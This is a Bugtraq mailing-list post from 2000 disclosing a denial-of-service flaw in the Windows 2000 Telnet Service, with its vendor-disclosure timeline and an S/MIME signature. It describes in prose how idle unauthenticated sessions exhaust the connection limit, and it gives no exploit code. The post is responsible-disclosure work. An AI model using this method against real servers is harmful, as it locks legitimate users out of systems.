[17857] in bugtraq
Windows 2000 Telnet Service DoS
daemon@ATHENA.MIT.EDU (Alexander Ivanchev)
Thu Nov 30 15:36:08 2000
Mime-Version: 1.0
Content-Type: multipart/signed;
boundary="----=_NextPart_000_0004_01C05A60.CC1E1E20";
micalg=SHA1; protocol="application/x-pkcs7-signature"
Message-Id: <HMECJFFOAFOAGOPBEHPPAEHOCAAA.ai@bulinfo.net>
Date: Thu, 30 Nov 2000 00:02:23 +0100
Reply-To: Alexander Ivanchev <ai@BULINFO.NET>
From: Alexander Ivanchev <ai@BULINFO.NET>
To: BUGTRAQ@SECURITYFOCUS.COM
This is a multi-part message in MIME format.
------=_NextPart_000_0004_01C05A60.CC1E1E20
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Below is the original message sent to Microsoft, and since apparently
'Disclosure Procedures' are once again in focus...
11/08/2000 - Issue is reported to Microsoft's Security Response Team
(secure@microsoft.com)
11/10/2000 - Microsoft confirmed receipt
11/21/2000 - Microsoft responded that they reproduced the issue, and were
evaluating code changes
11/30/2000 - Due to the expiration of the 21-days vendor-response period,
the issue is made public
-----Original Message-----
From: Alexander Ivanchev [mailto:ai@bulinfo.net]
Sent: Thursday, November 09, 2000 16:22
To: secure@microsoft.com
Subject: Windows 2000 Telnet Service DoS
Hello.
I'd like to report the following issue with Windows 2000's Telnet Service
Daemon:
1. System Environment:
Windows 2000 Professional Final Build [Version 5.00.2195]
Service Pack 1, All latest windowsupdate.com security updates (as of
11/08/2000)
Telnet Service Build 5.00.99201.1
2. Classification
Denial of Service, possible code problems
3. Details
a. DoS - The Telnet Service in question is vulnerable to a simple Denial
of Service attack. The problem apparently lies within the login routine of
the daemon. The problem can be demonstrated by telneting to a machine
running the specified version of the Telnet Service and waiting at the
login/password prompt until a session timeout takes place. However, after
it does time out the connection is not reset by the daemon until the user
presses a key. In Windows 2000 Professional, due to the fact, it allows
only one telnet connection per host, this will effectively disable access
for the authorized user. We did not test the problem with Server/Advanced
Server/Datacenter but I believe that by establishing the maximum number of
allowed connections and not terminating them would result in the same
problem. Thus, this constitutes a Denial of Service attack. Theoretically,
it is also quite possible to exhaust server side sockets if there is not a
limit imposed on the maximum number of telnet sessions.
b. Possible code problem - On the Windows 2000 Professional test machine
the above vulnerability was tested, the following strange behavior of the
telnet service was observed:
By establishing a telnet session, and not terminating it, during the wait
interval, attempts to establish a different telnet session fail with the
following message:
Microsoft Windows Workstation allows only 1 Telnet Client License
Server has closed connection
Connection to host lost.
However, when a connection is attempted AFTER the session had timed out,
but it is still not reset, SOMETIMES the following return message would
result:
~r?q?LL>ECHELON?ECHELON?ECHELON?echelon?echelon
Microsoft Windows Workstation allows only 1 Telnet Client License
Server has closed connection
Connection to host lost.
Where ECHELON is the hostname of the machine.
Needless to say, this does not seem right.
c. Note: When a machine comes under the above-described attack, the 'List
the current users' telnet admin option will NOT report established
connections, since a login would not have taken place, even though the
number of allowed connections could have been reached. (This of course
could be easily discovered using netstat or an equivalent utility)
4. Credits
The above problems were discovered and tested by Alexander Ivanchev of
Breach Technologies.
Alexander Ivanchev can be reached at ai@bulinfo.net or pr@breachtec.org
5. Disclosure Policy
Breach Technologies will wait for 21 days since the message is sent,
before disclosing details about the above matter. If an official
advisory/patch is/are released before this period ends, disclosure will
take place earlier
6. Feedback Policy
Please feel free to contact us with questions, corrections and comments
regarding these issues.
Thank you for your time and attention!
------=_NextPart_000_0004_01C05A60.CC1E1E20
Content-Type: application/x-pkcs7-signature;
name="smime.p7s"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename="smime.p7s"
MIAGCSqGSIb3DQEHAqCAMIACAQExCzAJBgUrDgMCGgUAMIAGCSqGSIb3DQEHAQAAoIIJ/DCCAjww
ggGlAhAyUDPPUNFW81yBrWVcT8glMA0GCSqGSIb3DQEBAgUAMF8xCzAJBgNVBAYTAlVTMRcwFQYD
VQQKEw5WZXJpU2lnbiwgSW5jLjE3MDUGA1UECxMuQ2xhc3MgMSBQdWJsaWMgUHJpbWFyeSBDZXJ0
aWZpY2F0aW9uIEF1dGhvcml0eTAeFw05NjAxMjkwMDAwMDBaFw0yMDAxMDcyMzU5NTlaMF8xCzAJ
BgNVBAYTAlVTMRcwFQYDVQQKEw5WZXJpU2lnbiwgSW5jLjE3MDUGA1UECxMuQ2xhc3MgMSBQdWJs
aWMgUHJpbWFyeSBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTCBnzANBgkqhkiG9w0BAQEFAAOBjQAw
gYkCgYEA5Rm/baNWYS2ZSHH2Z965jeu3noaACpEO+jglr0aIguVzqKCbJF0NH8xlbgyw0FaEGIea
BpsQoXPftFg5a27B9hXVqKg/qhIGjTGsf7A01480Z4gJzRQR4k5FVmkfeAKA2txHkSm7NsljXMXg
1y2He6G3MrB7MLoqLzGq7qNn2tsCAwEAATANBgkqhkiG9w0BAQIFAAOBgQBLRGZgaGTkmBvzsHLm
lYl83XuzlcAdLtjYGdAtND3GUJoQhoyqPzuoBPw3UpXD2cnbzfKGBsSxG/CCiDBCjhdQHGR6uD6Z
SXSX/KwCQ/uWDFYEJQx8fIedJKfY8DIptaTfXaJMxRYyqEL2Raa2Nrngv2U2k8LS12vc3lnWojX4
RTCCAy4wggKXoAMCAQICEQDSdi6NFAw9fbKoJV2v7g11MA0GCSqGSIb3DQEBAgUAMF8xCzAJBgNV
BAYTAlVTMRcwFQYDVQQKEw5WZXJpU2lnbiwgSW5jLjE3MDUGA1UECxMuQ2xhc3MgMSBQdWJsaWMg
UHJpbWFyeSBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTAeFw05ODA1MTIwMDAwMDBaFw0wODA1MTIy
MzU5NTlaMIHMMRcwFQYDVQQKEw5WZXJpU2lnbiwgSW5jLjEfMB0GA1UECxMWVmVyaVNpZ24gVHJ1
c3QgTmV0d29yazFGMEQGA1UECxM9d3d3LnZlcmlzaWduLmNvbS9yZXBvc2l0b3J5L1JQQSBJbmNv
cnAuIEJ5IFJlZi4sTElBQi5MVEQoYyk5ODFIMEYGA1UEAxM/VmVyaVNpZ24gQ2xhc3MgMSBDQSBJ
bmRpdmlkdWFsIFN1YnNjcmliZXItUGVyc29uYSBOb3QgVmFsaWRhdGVkMIGfMA0GCSqGSIb3DQEB
AQUAA4GNADCBiQKBgQC7WkSKBBa7Vf0DeootlE8VeDa4DUqyb5xUv7zodyqdufBou5XZMUFweoFL
uUgTVi3HCOGEQqvAopKrRFyqQvCCDgLpL/vCO7u+yScKXbawNkIztW5UiE+HSr8Z2vkV6A+Hthzj
zMaajn9qJJLj/OBluqexfu/J2zdqyErICQbkmQIDAQABo3wwejARBglghkgBhvhCAQEEBAMCAQYw
RwYDVR0gBEAwPjA8BgtghkgBhvhFAQcBATAtMCsGCCsGAQUFBwIBFh93d3cudmVyaXNpZ24uY29t
L3JlcG9zaXRvcnkvUlBBMA8GA1UdEwQIMAYBAf8CAQAwCwYDVR0PBAQDAgEGMA0GCSqGSIb3DQEB
AgUAA4GBAIi4Nzvd2pQ3AK2qn+GBAXEekmptL/bxndPKZDjcG5gMB4ZbhRVqD7lJhaSV8Rd9Z7R/
LSzdmkKewz60jqrlCwbe8lYq+jPHvhnXU0zDvcjjF7WkSUJj7MKmFw9dWBpJPJBcVaNlIAD9GCDl
X4KmsaiSxVhqwY0DPOvDzQWikK5uMIIEhjCCA++gAwIBAgIQYR6rnDkGEuzHYCKAeBt4zDANBgkq
hkiG9w0BAQQFADCBzDEXMBUGA1UEChMOVmVyaVNpZ24sIEluYy4xHzAdBgNVBAsTFlZlcmlTaWdu
IFRydXN0IE5ldHdvcmsxRjBEBgNVBAsTPXd3dy52ZXJpc2lnbi5jb20vcmVwb3NpdG9yeS9SUEEg
SW5jb3JwLiBCeSBSZWYuLExJQUIuTFREKGMpOTgxSDBGBgNVBAMTP1ZlcmlTaWduIENsYXNzIDEg
Q0EgSW5kaXZpZHVhbCBTdWJzY3JpYmVyLVBlcnNvbmEgTm90IFZhbGlkYXRlZDAeFw0wMDEwMjQw
MDAwMDBaFw0wMDEyMjMyMzU5NTlaMIIBCjEXMBUGA1UEChMOVmVyaVNpZ24sIEluYy4xHzAdBgNV
BAsTFlZlcmlTaWduIFRydXN0IE5ldHdvcmsxRjBEBgNVBAsTPXd3dy52ZXJpc2lnbi5jb20vcmVw
b3NpdG9yeS9SUEEgSW5jb3JwLiBieSBSZWYuLExJQUIuTFREKGMpOTgxHjAcBgNVBAsTFVBlcnNv
bmEgTm90IFZhbGlkYXRlZDEnMCUGA1UECxMeRGlnaXRhbCBJRCBDbGFzcyAxIC0gTWljcm9zb2Z0
MR4wHAYDVQQDFBVBbGV4YW5kZXIgTC4gSXZhbmNoZXYxHTAbBgkqhkiG9w0BCQEWDmFpQGJ1bGlu
Zm8ubmV0MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCg5Z36xBOTIiAvLiIMTWE9LdZA8BB4
xWesPStVEG9jM3aO2En4AwdBUGoj7nY5mo9mRuYbUjO1PMuSL0KspjwhMW1MOWEOFHPACk51VU8t
t7TRb0Ha4R99KKd1v/RCR0t8PiCyZahj1ii9aR1vJ0cOc7s4w2cPc4cnSrkpC0Kk5QIDAQABo4IB
JjCCASIwCQYDVR0TBAIwADBEBgNVHSAEPTA7MDkGC2CGSAGG+EUBBwEIMCowKAYIKwYBBQUHAgEW
HGh0dHBzOi8vd3d3LnZlcmlzaWduLmNvbS9ycGEwEQYJYIZIAYb4QgEBBAQDAgeAMIGGBgpghkgB
hvhFAQYDBHgWdmQ0NjUyYmQ2M2YyMDQ3MDI5Mjk4NzYzYzlkMmYyNzUwNjljNzM1OWJlZDFiMDU5
ZGE3NWJjNGJjOTcwMTc0N2RhNWQzZjIxNDFiZWFkYjJiZDJlODkyMTRhZDZiZjFkZTExNDk5YmEy
YjM0NWY0ZjNlYTQ1MDcwMwYDVR0fBCwwKjAooCagJIYiaHR0cDovL2NybC52ZXJpc2lnbi5jb20v
Y2xhc3MxLmNybDANBgkqhkiG9w0BAQQFAAOBgQB1vLAwmUwcUZV6upEFNDCoY2EoxOJ/Nj18i5IL
GsA08EuZtA+9pD0PXa6ZZu9SZIDwo5n4yinXkxfLxb/l+hu6JzkZEKrlvyJCS4YmgQocuiiAbkNN
4kjobrWezqHKukRUtz1QLIgMEyu7qi9TTcTDbyQDgWJVFDMTPN70A3LM5DGCAzgwggM0AgEBMIHh
MIHMMRcwFQYDVQQKEw5WZXJpU2lnbiwgSW5jLjEfMB0GA1UECxMWVmVyaVNpZ24gVHJ1c3QgTmV0
d29yazFGMEQGA1UECxM9d3d3LnZlcmlzaWduLmNvbS9yZXBvc2l0b3J5L1JQQSBJbmNvcnAuIEJ5
IFJlZi4sTElBQi5MVEQoYyk5ODFIMEYGA1UEAxM/VmVyaVNpZ24gQ2xhc3MgMSBDQSBJbmRpdmlk
dWFsIFN1YnNjcmliZXItUGVyc29uYSBOb3QgVmFsaWRhdGVkAhBhHqucOQYS7MdgIoB4G3jMMAkG
BSsOAwIaBQCgggGsMBgGCSqGSIb3DQEJAzELBgkqhkiG9w0BBwEwHAYJKoZIhvcNAQkFMQ8XDTAw
MTEyOTIzMDIxNVowIwYJKoZIhvcNAQkEMRYEFEHcvlnMX3XztBEpz1L/a1NkF9LNMFgGCSqGSIb3
DQEJDzFLMEkwCgYIKoZIhvcNAwcwDgYIKoZIhvcNAwICAgCAMAcGBSsOAwIHMA0GCCqGSIb3DQMC
AgEoMAcGBSsOAwIaMAoGCCqGSIb3DQIFMIHyBgkrBgEEAYI3EAQxgeQwgeEwgcwxFzAVBgNVBAoT
DlZlcmlTaWduLCBJbmMuMR8wHQYDVQQLExZWZXJpU2lnbiBUcnVzdCBOZXR3b3JrMUYwRAYDVQQL
Ez13d3cudmVyaXNpZ24uY29tL3JlcG9zaXRvcnkvUlBBIEluY29ycC4gQnkgUmVmLixMSUFCLkxU
RChjKTk4MUgwRgYDVQQDEz9WZXJpU2lnbiBDbGFzcyAxIENBIEluZGl2aWR1YWwgU3Vic2NyaWJl
ci1QZXJzb25hIE5vdCBWYWxpZGF0ZWQCEGEeq5w5BhLsx2AigHgbeMwwDQYJKoZIhvcNAQEBBQAE
gYBj3cAneYkc6rGSO9TBa1zZcshKXK/L/ySPyXmWlXvKBOUK+7JMuTIpvK9lAz5706YlwEfR6F/J
WRuDXaN2pPgAClVypZ/bNf1obHhBPKNa5EnIkHY8fuTsiY1ukCQdYE6ywTVHTcEi+MPQLyxidpt2
zWZYpPvOwAG6asq9KCom0AAAAAAAAA==
------=_NextPart_000_0004_01C05A60.CC1E1E20--
